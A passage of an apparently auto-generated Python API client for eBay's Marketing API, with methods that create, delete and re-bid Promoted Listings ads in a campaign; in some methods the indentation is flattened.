This method adds multiple listings to an existing Promoted Listings campaign using listingId values generated by either the Trading API or Inventory API. For each listing ID specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its listingId, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads with using the campaign_id path parameter. Listing IDs are generated by eBay when a seller creates listings with the Trading API. You can specify a maximum of 500 listings per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_ads_by_listing_id(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdRequest body: The container for the bulk request to create ads for eBay listing IDs. eBay listing IDs are generated by the Trading API and Inventory API when the listing is created on eBay. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkAdResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_create_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_create_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
    def bulk_create_ads_by_listing_id_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
        """bulk_create_ads_by_listing_id # noqa: E501
        This method adds multiple listings to an existing Promoted Listings campaign using listingId values generated by either the Trading API or Inventory API. For each listing ID specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its listingId, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads with using the campaign_id path parameter. Listing IDs are generated by eBay when a seller creates listings with the Trading API. You can specify a maximum of 500 listings per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.bulk_create_ads_by_listing_id_with_http_info(body, campaign_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param BulkCreateAdRequest body: The container for the bulk request to create ads for eBay listing IDs. eBay listing IDs are generated by the Trading API and Inventory API when the listing is created on eBay. (required)
        :param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
        :return: BulkAdResponse
        If the method is called asynchronously,
        returns the request thread.
        """
        # NOTE(review): auto-generated by swagger-codegen; manual edits here
        # will be lost on regeneration.
        # Accepted kwargs: the documented parameters plus client plumbing flags.
        all_params = ['body', 'campaign_id'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots self/body/campaign_id/kwargs for uniform handling.
        params = locals()
        # Reject any keyword argument that is not in the accepted list.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method bulk_create_ads_by_listing_id" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `bulk_create_ads_by_listing_id`") # noqa: E501
        # verify the required parameter 'campaign_id' is set
        if ('campaign_id' not in params or
                params['campaign_id'] is None):
            raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_create_ads_by_listing_id`") # noqa: E501
        collection_formats = {}
        # campaign_id is substituted into the resource path below.
        path_params = {}
        if 'campaign_id' in params:
            path_params['campaign_id'] = params['campaign_id'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['api_auth'] # noqa: E501
        # Delegate the actual HTTP call (and async handling) to the client.
        return self.api_client.call_api(
            '/ad_campaign/{campaign_id}/bulk_create_ads_by_listing_id', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='BulkAdResponse', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def bulk_delete_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_delete_ads_by_inventory_reference # noqa: E501
This method works with listings created with the Inventory API. The method deletes a set of ads, as specified by a list of inventory reference IDs, from the specified campaign. Inventory reference IDs are seller-defined IDs that are used with the Inventory API. Pass the campaign_id as a path parameter and populate the payload with a list of inventoryReferenceId and inventoryReferenceType pairs that you want to delete. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteAdsByInventoryReferenceRequest body: This request object defines the fields for a bulkDeleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkDeleteAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_delete_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_delete_ads_by_inventory_reference  # noqa: E501

    HTTP-info variant: deletes a set of ads from the specified campaign by
    inventory reference ID (Inventory API listings). See
    bulk_delete_ads_by_inventory_reference for the endpoint description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_delete_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkDeleteAdsByInventoryReferenceRequest body: Request object carrying the fields for a bulkDeleteAdsByInventoryReference call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkDeleteAdsByInventoryReferenceResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `body` or `campaign_id` is missing/None.
    """
    all_params = [
        'body',
        'campaign_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Gather the positional arguments plus any recognized keyword options;
    # anything else is a caller error.
    params = {'body': body, 'campaign_id': campaign_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method bulk_delete_ads_by_inventory_reference" % key
            )
        params[key] = val

    # Both positional parameters are required and may not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `bulk_delete_ads_by_inventory_reference`")  # noqa: E501
    if params.get('campaign_id') is None:
        raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_delete_ads_by_inventory_reference`")  # noqa: E501

    # campaign_id is interpolated into the URL path; the request object
    # travels as the JSON body.
    path_params = {'campaign_id': params['campaign_id']}  # noqa: E501
    body_params = params['body']

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/ad_campaign/{campaign_id}/bulk_delete_ads_by_inventory_reference', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=body_params,
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='BulkDeleteAdsByInventoryReferenceResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def bulk_delete_ads_by_listing_id(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_delete_ads_by_listing_id  # noqa: E501

    Deletes a set of ads, identified by listing ID, from a Promoted
    Listings campaign. Works with listing IDs created with either the
    Trading API or the Inventory API (eBay generates a listing ID when a
    seller creates a listing). Pass campaign_id as a path parameter and a
    payload with the set of listing IDs to delete. Campaign IDs come from
    getCampaigns; a seller's inventory reference IDs come from getAds.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_delete_ads_by_listing_id(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkDeleteAdRequest body: Request object carrying the fields for a bulkDeleteAdsByListingId call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkDeleteAdResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # body; the *_with_http_info variant handles both the synchronous call
    # and the async_req=True case (where it returns the request thread).
    kwargs['_return_http_data_only'] = True
    return self.bulk_delete_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs)  # noqa: E501
def bulk_delete_ads_by_listing_id_with_http_info(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_delete_ads_by_listing_id  # noqa: E501

    HTTP-info variant: deletes a set of ads from a campaign by listing ID
    (Trading API or Inventory API listings). See
    bulk_delete_ads_by_listing_id for the endpoint description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_delete_ads_by_listing_id_with_http_info(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkDeleteAdRequest body: Request object carrying the fields for a bulkDeleteAdsByListingId call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkDeleteAdResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `body` or `campaign_id` is missing/None.
    """
    all_params = [
        'body',
        'campaign_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Gather the positional arguments plus any recognized keyword options;
    # anything else is a caller error.
    params = {'body': body, 'campaign_id': campaign_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method bulk_delete_ads_by_listing_id" % key
            )
        params[key] = val

    # Both positional parameters are required and may not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `bulk_delete_ads_by_listing_id`")  # noqa: E501
    if params.get('campaign_id') is None:
        raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_delete_ads_by_listing_id`")  # noqa: E501

    # campaign_id is interpolated into the URL path; the request object
    # travels as the JSON body.
    path_params = {'campaign_id': params['campaign_id']}  # noqa: E501
    body_params = params['body']

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/ad_campaign/{campaign_id}/bulk_delete_ads_by_listing_id', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=body_params,
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='BulkDeleteAdResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def bulk_update_ads_bid_by_inventory_reference(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_update_ads_bid_by_inventory_reference  # noqa: E501

    Updates the bidPercentage values for a set of ads associated with the
    specified campaign. Works with listings managed with the Inventory API:
    an inventory reference ID is either a seller-defined SKU value or an
    inventoryItemGroupKey (a seller-defined ID for a multiple-variation
    listing). Supply campaign_id as a path parameter and a request body of
    inventoryReferenceId / inventoryReferenceType pairs with the updated
    bidPercentage values. Campaign IDs come from getCampaigns; a seller's
    inventory reference IDs come from getAds.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_update_ads_bid_by_inventory_reference(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkCreateAdsByInventoryReferenceRequest body: Request object carrying the fields for a BulkCreateAdsByInventoryReference call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkCreateAdsByInventoryReferenceResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # body; the *_with_http_info variant handles both the synchronous call
    # and the async_req=True case (where it returns the request thread).
    kwargs['_return_http_data_only'] = True
    return self.bulk_update_ads_bid_by_inventory_reference_with_http_info(body, campaign_id, **kwargs)  # noqa: E501
def bulk_update_ads_bid_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_update_ads_bid_by_inventory_reference  # noqa: E501

    HTTP-info variant: updates bidPercentage values for a set of ads in a
    campaign by inventory reference (Inventory API listings). See
    bulk_update_ads_bid_by_inventory_reference for the endpoint
    description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_update_ads_bid_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkCreateAdsByInventoryReferenceRequest body: Request object carrying the fields for a BulkCreateAdsByInventoryReference call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkCreateAdsByInventoryReferenceResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `body` or `campaign_id` is missing/None.
    """
    all_params = [
        'body',
        'campaign_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Gather the positional arguments plus any recognized keyword options;
    # anything else is a caller error.
    params = {'body': body, 'campaign_id': campaign_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method bulk_update_ads_bid_by_inventory_reference" % key
            )
        params[key] = val

    # Both positional parameters are required and may not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `bulk_update_ads_bid_by_inventory_reference`")  # noqa: E501
    if params.get('campaign_id') is None:
        raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_update_ads_bid_by_inventory_reference`")  # noqa: E501

    # campaign_id is interpolated into the URL path; the request object
    # travels as the JSON body.
    path_params = {'campaign_id': params['campaign_id']}  # noqa: E501
    body_params = params['body']

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/ad_campaign/{campaign_id}/bulk_update_ads_bid_by_inventory_reference', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=body_params,
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='BulkCreateAdsByInventoryReferenceResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def bulk_update_ads_bid_by_listing_id(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_update_ads_bid_by_listing_id  # noqa: E501

    Updates the bidPercentage values for a set of ads associated with the
    specified campaign. Works with listings created with either the
    Trading API or the Inventory API (eBay generates a listing ID when a
    listing is created with the Trading API). Supply campaign_id as a path
    parameter and a request body of listing IDs with their updated
    bidPercentage values. Campaign IDs come from getCampaigns; a seller's
    inventory reference IDs come from getAds.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_update_ads_bid_by_listing_id(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkCreateAdRequest body: Request object carrying the fields for a BulkCreateAdsByListingId call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkAdResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # body; the *_with_http_info variant handles both the synchronous call
    # and the async_req=True case (where it returns the request thread).
    kwargs['_return_http_data_only'] = True
    return self.bulk_update_ads_bid_by_listing_id_with_http_info(body, campaign_id, **kwargs)  # noqa: E501
def bulk_update_ads_bid_by_listing_id_with_http_info(self, body, campaign_id, **kwargs):  # noqa: E501
    """bulk_update_ads_bid_by_listing_id  # noqa: E501

    HTTP-info variant: updates bidPercentage values for a set of ads in a
    campaign by listing ID (Trading API or Inventory API listings). See
    bulk_update_ads_bid_by_listing_id for the endpoint description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.bulk_update_ads_bid_by_listing_id_with_http_info(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param BulkCreateAdRequest body: Request object carrying the fields for a BulkCreateAdsByListingId call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: BulkAdResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `body` or `campaign_id` is missing/None.
    """
    all_params = [
        'body',
        'campaign_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Gather the positional arguments plus any recognized keyword options;
    # anything else is a caller error.
    params = {'body': body, 'campaign_id': campaign_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method bulk_update_ads_bid_by_listing_id" % key
            )
        params[key] = val

    # Both positional parameters are required and may not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `bulk_update_ads_bid_by_listing_id`")  # noqa: E501
    if params.get('campaign_id') is None:
        raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_update_ads_bid_by_listing_id`")  # noqa: E501

    # campaign_id is interpolated into the URL path; the request object
    # travels as the JSON body.
    path_params = {'campaign_id': params['campaign_id']}  # noqa: E501
    body_params = params['body']

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/ad_campaign/{campaign_id}/bulk_update_ads_bid_by_listing_id', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=body_params,
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='BulkAdResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_ad_by_listing_id(self, body, campaign_id, **kwargs):  # noqa: E501
    """create_ad_by_listing_id  # noqa: E501

    Creates an ad for the specified listing ID, sets its bid percentage
    (the "ad rate"), and associates it with the specified campaign. Works
    with listings created with either the Trading API or the Inventory
    API. Specify the listingId and bidPercentage in the request payload
    and the target campaign via the campaign_id path parameter. Each
    campaign can hold ads for a maximum of 50,000 items (each item of a
    multiple-variation listing counts individually). Use createCampaign to
    create a campaign and getCampaigns to list existing ones.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_ad_by_listing_id(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CreateAdRequest body: Request object carrying the fields for a createAdByListingId call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # body; the *_with_http_info variant handles both the synchronous call
    # and the async_req=True case (where it returns the request thread).
    kwargs['_return_http_data_only'] = True
    return self.create_ad_by_listing_id_with_http_info(body, campaign_id, **kwargs)  # noqa: E501
def create_ad_by_listing_id_with_http_info(self, body, campaign_id, **kwargs):  # noqa: E501
    """create_ad_by_listing_id  # noqa: E501

    HTTP-info variant: creates an ad for a listing ID, sets its bid
    percentage, and attaches it to the given campaign. See
    create_ad_by_listing_id for the endpoint description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_ad_by_listing_id_with_http_info(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CreateAdRequest body: Request object carrying the fields for a createAdByListingId call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `body` or `campaign_id` is missing/None.
    """
    all_params = [
        'body',
        'campaign_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Gather the positional arguments plus any recognized keyword options;
    # anything else is a caller error.
    params = {'body': body, 'campaign_id': campaign_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_ad_by_listing_id" % key
            )
        params[key] = val

    # Both positional parameters are required and may not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `create_ad_by_listing_id`")  # noqa: E501
    if params.get('campaign_id') is None:
        raise ValueError("Missing the required parameter `campaign_id` when calling `create_ad_by_listing_id`")  # noqa: E501

    # campaign_id is interpolated into the URL path; the request object
    # travels as the JSON body.
    path_params = {'campaign_id': params['campaign_id']}  # noqa: E501
    body_params = params['body']

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/ad_campaign/{campaign_id}/ad', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=body_params,
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_ads_by_inventory_reference(self, body, campaign_id, **kwargs):  # noqa: E501
    """create_ads_by_inventory_reference  # noqa: E501

    Creates an ad for the specified listing, sets its bid percentage (the
    "ad rate"), and associates it with the specified campaign. Works with
    listings managed with the Inventory API: an inventory reference ID is
    either a seller-defined SKU value or an inventoryItemGroupKey (a
    seller-defined ID for a multiple-variation listing). Specify the
    inventoryReferenceId, inventoryReferenceType, and bidPercentage in the
    request payload and the target campaign via the campaign_id path
    parameter. Each campaign can hold ads for a maximum of 50,000 items
    (each item of a multiple-variation listing counts individually). Use
    createCampaign to create a campaign and getCampaigns to list existing
    ones.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_ads_by_inventory_reference(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CreateAdsByInventoryReferenceRequest body: Request object carrying the fields for a createAdsByInventoryReference call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: AdReferences
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # body; the *_with_http_info variant handles both the synchronous call
    # and the async_req=True case (where it returns the request thread).
    kwargs['_return_http_data_only'] = True
    return self.create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs)  # noqa: E501
def create_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs):  # noqa: E501
    """create_ads_by_inventory_reference  # noqa: E501

    HTTP-info variant: creates an ad by inventory reference, sets its bid
    percentage, and attaches it to the given campaign (Inventory API
    listings). See create_ads_by_inventory_reference for the endpoint
    description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param CreateAdsByInventoryReferenceRequest body: Request object carrying the fields for a createAdsByInventoryReference call. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: AdReferences
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `body` or `campaign_id` is missing/None.
    """
    all_params = [
        'body',
        'campaign_id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Gather the positional arguments plus any recognized keyword options;
    # anything else is a caller error.
    params = {'body': body, 'campaign_id': campaign_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_ads_by_inventory_reference" % key
            )
        params[key] = val

    # Both positional parameters are required and may not be None.
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `create_ads_by_inventory_reference`")  # noqa: E501
    if params.get('campaign_id') is None:
        raise ValueError("Missing the required parameter `campaign_id` when calling `create_ads_by_inventory_reference`")  # noqa: E501

    # campaign_id is interpolated into the URL path; the request object
    # travels as the JSON body.
    path_params = {'campaign_id': params['campaign_id']}  # noqa: E501
    body_params = params['body']

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/ad_campaign/{campaign_id}/create_ads_by_inventory_reference', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=body_params,
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='AdReferences',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_ad(self, ad_id, campaign_id, **kwargs):  # noqa: E501
    """delete_ad  # noqa: E501

    Removes the specified ad from the specified campaign. Pass the ID of
    the ad to delete and the ID of the campaign it belongs to as path
    parameters. Call getCampaigns to get the current list of the seller's
    campaign IDs.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_ad(ad_id, campaign_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ad_id: Identifier of an ad, generated when the ad was created. (required)
    :param str campaign_id: Unique eBay-assigned ID of an ad campaign, generated when the campaign is created; obtainable via getCampaigns. (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # body; the *_with_http_info variant handles both the synchronous call
    # and the async_req=True case (where it returns the request thread).
    kwargs['_return_http_data_only'] = True
    return self.delete_ad_with_http_info(ad_id, campaign_id, **kwargs)  # noqa: E501
def delete_ad_with_http_info(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""delete_ad # noqa: E501
This method removes the specified ad from the specified campaign. Pass the ID of the ad to delete with the ID of the campaign associated with the ad as path parameters to the call. Call getCampaigns to get the current list of the seller's campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ad_with_http_info(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
